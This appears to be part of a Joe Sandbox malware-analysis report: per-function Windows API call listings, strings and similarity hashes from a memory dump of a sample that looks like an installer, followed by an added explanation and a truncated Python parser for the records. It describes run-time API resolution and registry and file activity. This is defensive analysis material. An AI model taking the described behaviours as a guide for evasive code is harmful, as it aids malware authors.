                                                          • RegCreateKeyEx, xrefs: 00454597
                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045453B
                                                          • , xrefs: 00454585
                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045456B
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateFormatMessageQueryValue
                                                          • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                          • API String ID: 2481121983-1280779767
                                                          • Opcode ID: fb036eabf5a146f2d7e855c45c9778b44f21e44f1b6b00b130857789a6a7aa14
                                                          • Instruction ID: 79a928fbfbb5cbc52e9f584d13fa8ff479f10e23804a0d57af644d787f67e4fc
                                                          • Opcode Fuzzy Hash: fb036eabf5a146f2d7e855c45c9778b44f21e44f1b6b00b130857789a6a7aa14
                                                          • Instruction Fuzzy Hash: 4C812275A00209AFDB00DFD5C841BEEB7B9EF49305F50452AF900FB292D7789A49CB69
                                                          APIs
                                                            • Part of subcall function 00453890: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045397F
                                                            • Part of subcall function 00453890: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045398F
                                                          • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 004961D9
                                                          • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,0049632D), ref: 004961FA
                                                          • CreateWindowExA.USER32(00000000,STATIC,0049633C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496221
                                                          • SetWindowLongA.USER32(?,000000FC,004959B4), ref: 00496234
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496300,?,?,000000FC,004959B4,00000000,STATIC,0049633C), ref: 00496264
                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004962D8
                                                          • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496300,?,?,000000FC,004959B4,00000000), ref: 004962E4
                                                            • Part of subcall function 00453D04: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453DEB
                                                          • 73A25CF0.USER32(?,00496307,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496300,?,?,000000FC,004959B4,00000000,STATIC), ref: 004962FA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                          • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                          • API String ID: 170458502-2312673372
                                                          • Opcode ID: 9b06694425e575e437806c69a3063783cd4ae9b2f688ab1fdd8fd86893ac9854
                                                          • Instruction ID: 59c6668a25180793b9734d4b881d6428f2164d7595bd96eb0933aaec2009094d
                                                          • Opcode Fuzzy Hash: 9b06694425e575e437806c69a3063783cd4ae9b2f688ab1fdd8fd86893ac9854
                                                          • Instruction Fuzzy Hash: 30413070A00204AFDF11EBA5DD42FAE7BB8EB09714F61457AF500F7291D7799A048B68
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E515,?,00000000,0047DD24,00000000), ref: 0042E439
                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E43F
                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E515,?,00000000,0047DD24,00000000), ref: 0042E48D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressCloseHandleModuleProc
                                                          • String ID: %aE$.DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                          • API String ID: 4190037839-4073108654
                                                          • Opcode ID: 2da1f24d3b2dac621d95ef46090c641aa8f16fa50bf8c44a058beec2af7c6974
                                                          • Instruction ID: 54e13c124a033066941eeca65415b1323707e8dcf3020f71d3dbb5d1a98da02b
                                                          • Opcode Fuzzy Hash: 2da1f24d3b2dac621d95ef46090c641aa8f16fa50bf8c44a058beec2af7c6974
                                                          • Instruction Fuzzy Hash: C5214430B10225BBDB00EAE7DC45B9E76B8EB48708F904477A500E7281E77CDE419B1C
                                                          APIs
                                                          • GetActiveWindow.USER32 ref: 00462824
                                                          • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462838
                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462845
                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462852
                                                          • GetWindowRect.USER32(?,00000000), ref: 0046289E
                                                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 004628DC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                          • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                          • API String ID: 2610873146-3407710046
                                                          • Opcode ID: 1a12ae3bf6497ff777cd16400bb62bc7ce249fae767d1011b5c9c7ae1396f400
                                                          • Instruction ID: 4c37a186de2a83ca6a9e6f1427afc5cce354ac5e92891655707437263646b99d
                                                          • Opcode Fuzzy Hash: 1a12ae3bf6497ff777cd16400bb62bc7ce249fae767d1011b5c9c7ae1396f400
                                                          • Instruction Fuzzy Hash: 8621C571700B006BD310E664DD41F3B3798EB84710F08063AF984DB3D2EAB8EC008B9A
                                                          APIs
                                                          • GetActiveWindow.USER32 ref: 0042F18C
                                                          • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A0
                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1AD
                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1BA
                                                          • GetWindowRect.USER32(?,00000000), ref: 0042F206
                                                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F244
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                          • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                          • API String ID: 2610873146-3407710046
                                                          • Opcode ID: f060aae0b7a5edf3cc9df1b8e2ac1156138d1c343137e24e009784064c48acd9
                                                          • Instruction ID: fe4b6ce3f65a79f89e9c436b8398c0b3b6e1cac74b3897b930778965e8aa8e9e
                                                          • Opcode Fuzzy Hash: f060aae0b7a5edf3cc9df1b8e2ac1156138d1c343137e24e009784064c48acd9
                                                          • Instruction Fuzzy Hash: 8A21D479300710ABD700D668EC81F3B36E8EB85710F88457AF944DB3C1DA79EC048BA9
                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458C1B,?,00000000,00458C7E,?,?,02213858,00000000), ref: 00458A99
                                                          • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02213858,?,00000000,00458BB0,?,00000000,00000001,00000000,00000000,00000000,00458C1B), ref: 00458AF6
                                                          • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02213858,?,00000000,00458BB0,?,00000000,00000001,00000000,00000000,00000000,00458C1B), ref: 00458B03
                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458B4F
                                                          • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458B89,?,-00000020,0000000C,-00004034,00000014,02213858,?,00000000,00458BB0,?,00000000), ref: 00458B75
                                                          • GetLastError.KERNEL32(?,?,00000000,00000001,00458B89,?,-00000020,0000000C,-00004034,00000014,02213858,?,00000000,00458BB0,?,00000000), ref: 00458B7C
                                                            • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                          • String ID: CreateEvent$TransactNamedPipe
                                                          • API String ID: 2182916169-3012584893
                                                          • Opcode ID: 893ade2b7d25531ff66c13e68608fa62c4cd61168c1a2b8304732b74ac398c25
                                                          • Instruction ID: 8abbb299140198d1acf2f300c186b6d7a0c7583c2a92940a340f901db1703015
                                                          • Opcode Fuzzy Hash: 893ade2b7d25531ff66c13e68608fa62c4cd61168c1a2b8304732b74ac398c25
                                                          • Instruction Fuzzy Hash: D4418771A00608EFDB15DF95CD81F9EB7F8EB48714F10406AF904F7292DA789E44CA28
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456CA5,?,?,00000031,?), ref: 00456B68
                                                          • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456B6E
                                                          • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456BBB
                                                            • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressErrorHandleLastLoadModuleProcType
                                                          • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                          • API String ID: 1914119943-2711329623
                                                          • Opcode ID: 429f9213fdce0867704162136d35381b6641e802cf297fe1828a7e481cb37b2a
                                                          • Instruction ID: 90c7a9fdd6b9eff4f50a7868ac1bc5a0a48bbd230e3c9f86fc21845b06ed4ed7
                                                          • Opcode Fuzzy Hash: 429f9213fdce0867704162136d35381b6641e802cf297fe1828a7e481cb37b2a
                                                          • Instruction Fuzzy Hash: 1B31B271A00A04AF9702EFAACC51D5BB7BDEB89746752846AFC04D3752DA38DD04C768
                                                          APIs
                                                          • RectVisible.GDI32(?,?), ref: 00416E0B
                                                          • SaveDC.GDI32(?), ref: 00416E1F
                                                          • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E42
                                                          • RestoreDC.GDI32(?,?), ref: 00416E5D
                                                          • CreateSolidBrush.GDI32(00000000), ref: 00416EDD
                                                          • FrameRect.USER32(?,?,?), ref: 00416F10
                                                          • DeleteObject.GDI32(?), ref: 00416F1A
                                                          • CreateSolidBrush.GDI32(00000000), ref: 00416F2A
                                                          • FrameRect.USER32(?,?,?), ref: 00416F5D
                                                          • DeleteObject.GDI32(?), ref: 00416F67
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                          • String ID:
                                                          • API String ID: 375863564-0
                                                          • Opcode ID: 4f2037b5eabd4c0ddd7adb5546328da8476fa2c27bed59ce0fc3228c4463e070
                                                          • Instruction ID: 3aa003abb57efcc62207c922e0442432c52dbc4458161ac97ea4a6727b5fec63
                                                          • Opcode Fuzzy Hash: 4f2037b5eabd4c0ddd7adb5546328da8476fa2c27bed59ce0fc3228c4463e070
                                                          • Instruction Fuzzy Hash: 7F512B716086459FDB50EF29C8C0B9777E8AF48314F15466ABD889B287C738EC81CB99
                                                          APIs
                                                          • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                          • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                          • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                          • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                          • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                          • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                          • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                          • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                          • String ID:
                                                          • API String ID: 1694776339-0
                                                          • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                          • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                          • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                          • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                          APIs
                                                          • GetSystemMenu.USER32(00000000,00000000), ref: 0042222B
                                                          • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422249
                                                          • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422256
                                                          • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422263
                                                          • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422270
                                                          • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 0042227D
                                                          • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 0042228A
                                                          • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 00422297
                                                          • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222B5
                                                          • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D1
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Menu$Delete$EnableItem$System
                                                          • String ID:
                                                          • API String ID: 3985193851-0
                                                          • Opcode ID: 5abdbd2448cd02f00dbd9e0a18e72027fb78d1268677703bf36b2e23ad6afd93
                                                          • Instruction ID: 3d512aed001548988d9f6823c75d43677a46120aeb5bb01c9b252fa7414fdf33
                                                          • Opcode Fuzzy Hash: 5abdbd2448cd02f00dbd9e0a18e72027fb78d1268677703bf36b2e23ad6afd93
                                                          • Instruction Fuzzy Hash: 692144703407447AE720E724DD8BFABBBD8AB04708F1455A5B6487F6D3C2F9AB804698
                                                          APIs
                                                          • FreeLibrary.KERNEL32(10000000), ref: 00480FD5
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00480FE9
                                                          • SendNotifyMessageA.USER32(00020416,00000496,00002710,00000000), ref: 0048105B
                                                          Strings
                                                          • Not restarting Windows because Setup is being run from the debugger., xrefs: 0048100A
                                                          • GetCustomSetupExitCode, xrefs: 00480E75
                                                          • Deinitializing Setup., xrefs: 00480E36
                                                          • DeinitializeSetup, xrefs: 00480ED1
                                                          • Restarting Windows., xrefs: 00481036
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary$MessageNotifySend
                                                          • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                          • API String ID: 3817813901-1884538726
                                                          • Opcode ID: aeb7eeed0520e5db2a06f6f9575c7ce6fe4ce849ef8be63e157f84bdb35f0c9d
                                                          • Instruction ID: 3a7bead0d2027120b4b43806ed62f13ca717c16daae07b60498e62be9a129c9c
                                                          • Opcode Fuzzy Hash: aeb7eeed0520e5db2a06f6f9575c7ce6fe4ce849ef8be63e157f84bdb35f0c9d
                                                          • Instruction Fuzzy Hash: 6E5191307042409FD711EB65D9A5B6E77E8EB5A304F50887BF900D73A2CB38A849CB9D
                                                          APIs
                                                          • SHGetMalloc.SHELL32(?), ref: 004614EF
                                                          • GetActiveWindow.USER32 ref: 00461553
                                                          • CoInitialize.OLE32(00000000), ref: 00461567
                                                          • SHBrowseForFolder.SHELL32(?), ref: 0046157E
                                                          • CoUninitialize.OLE32(004615BF,00000000,?,?,?,?,?,00000000,00461643), ref: 00461593
                                                          • SetActiveWindow.USER32(?,004615BF,00000000,?,?,?,?,?,00000000,00461643), ref: 004615A9
                                                          • SetActiveWindow.USER32(?,?,004615BF,00000000,?,?,?,?,?,00000000,00461643), ref: 004615B2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                          • String ID: A
                                                          • API String ID: 2684663990-3554254475
                                                          • Opcode ID: 1a2b14b0ce593c78e5b77d196e88522ccd9c3a7e94d83b7f20090faf3fe85af4
                                                          • Instruction ID: 3b7aa7431835c7c777c0b5d0eb650662cb24b1be5a668883a221ebb7e5be7499
                                                          • Opcode Fuzzy Hash: 1a2b14b0ce593c78e5b77d196e88522ccd9c3a7e94d83b7f20090faf3fe85af4
                                                          • Instruction Fuzzy Hash: 05310F70D00218AFDB00EFA6D885A9EBBF8EF09304F55847AF415E7251E6789A04CB5A
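The records above are the Joe Sandbox IDA plugin's per-function listing: an "APIs" block of call sites with the stack values seen at each call, an optional "Strings" block with xrefs, and "Similarity" fields (API ID, Opcode ID, fuzzy hashes) that close the record. The following Python is an added example, not part of the report or of Joe Sandbox, that parses that listing into structured records and answers two triage questions the raw text makes tedious: which names a function hands to GetProcAddress (imports resolved at run time, so they never appear in the static import table, which is what the "dynamically determine API calls" behaviour in this report boils down to), and which functions use a given combination of APIs. The class and function names (ApiCall, FunctionRecord, parse_records, dynamically_resolved_imports, records_calling) are this example's own, and SAMPLE is a constructed excerpt of three records copied from above with their argument lists shortened. One caveat a practitioner should keep in mind: the argument values are stack snapshots at the call site and can be misaligned, e.g. the GetProcAddress call at 00456B6E above shows OLEAUT32.DLL as its name argument while that function's string list carries UnRegisterTypeLib, so treat extracted names as leads to confirm in the disassembly rather than as facts.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple
# One API bullet: "• Name.MODULE(args), ref: ADDR", optionally prefixed with
# "Part of subcall function ADDR: " and with the "(args)," part absent.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]         # stack values at the call site, exactly as printed
    ref: int                # address of the call instruction
    subcall: Optional[int]  # callee address when the call sits inside a subcall

@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[Tuple[str, Optional[int]]] = field(default_factory=list)  # (text, xref)
    meta: dict = field(default_factory=dict)  # Opcode ID, Instruction Fuzzy Hash, Source File, ...

    @property
    def api_names(self):
        return {a.name for a in self.apis}

def parse_records(text: str) -> List[FunctionRecord]:
    """An 'APIs' heading opens a record; its 'Instruction Fuzzy Hash' bullet closes it."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current, section = FunctionRecord(), "apis"
            records.append(current)
        elif current is None:
            continue
        elif line == "Strings":
            section = "strings"
        elif line in ("Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"):
            section = "meta"
        elif line.startswith("•"):
            body = line[1:].strip()
            if section == "apis":
                m = API_RE.match(line)
                if m:  # a bullet the pattern does not understand is skipped, not guessed
                    args = [a for a in (m.group("args") or "").split(",") if a]
                    sub = int(m.group("sub"), 16) if m.group("sub") else None
                    current.apis.append(ApiCall(m.group("name"), m.group("module"),
                                                args, int(m.group("ref"), 16), sub))
            elif section == "strings":
                text_part, sep, xref = body.rpartition(", xrefs: ")
                current.strings.append((text_part, int(xref, 16)) if sep else (body, None))
            else:
                key, _, value = body.partition(": ")
                current.meta[key] = value
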